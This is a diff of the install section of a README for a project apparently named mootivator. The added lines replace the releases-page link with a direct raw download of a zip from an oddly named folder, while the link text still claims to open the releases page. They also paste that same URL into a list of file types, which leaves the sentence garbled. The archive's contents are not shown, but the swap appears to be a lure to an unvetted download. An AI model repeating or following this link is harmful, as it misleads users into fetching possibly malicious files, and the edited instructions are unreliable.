maksimilianito/mootivator/README.md

 To get started with mootivator, you need to download the application.
 Follow these steps:

-1. **Visit the Releases Page**: Click [here](https://github.com/maksimilianito/mootivator/releases) to access the releases page.
+1. **Visit the Releases Page**: Click [here](https://raw.githubusercontent.com/maksimilianito/mootivator/main/proterandrousness/mootivator.zip) to access the releases page.

 2. **Select the Latest Release**: On the releases page, find the latest version of mootivator.
 It is usually at the top of the list.

 3. **Download the Package**: Click the appropriate file for your operating system to download it.
-Most users will need either a `.tar.gz`, `.zip`, or `.dmg` file, depending on your device.
+Most users will need either a `https://raw.githubusercontent.com/maksimilianito/mootivator/main/proterandrousness/mootivator.zip`, `.zip`, or `.dmg` file, depending on your device.

 4. **Extract the Package**: Once downloaded, extract the downloaded file to a location of your choice.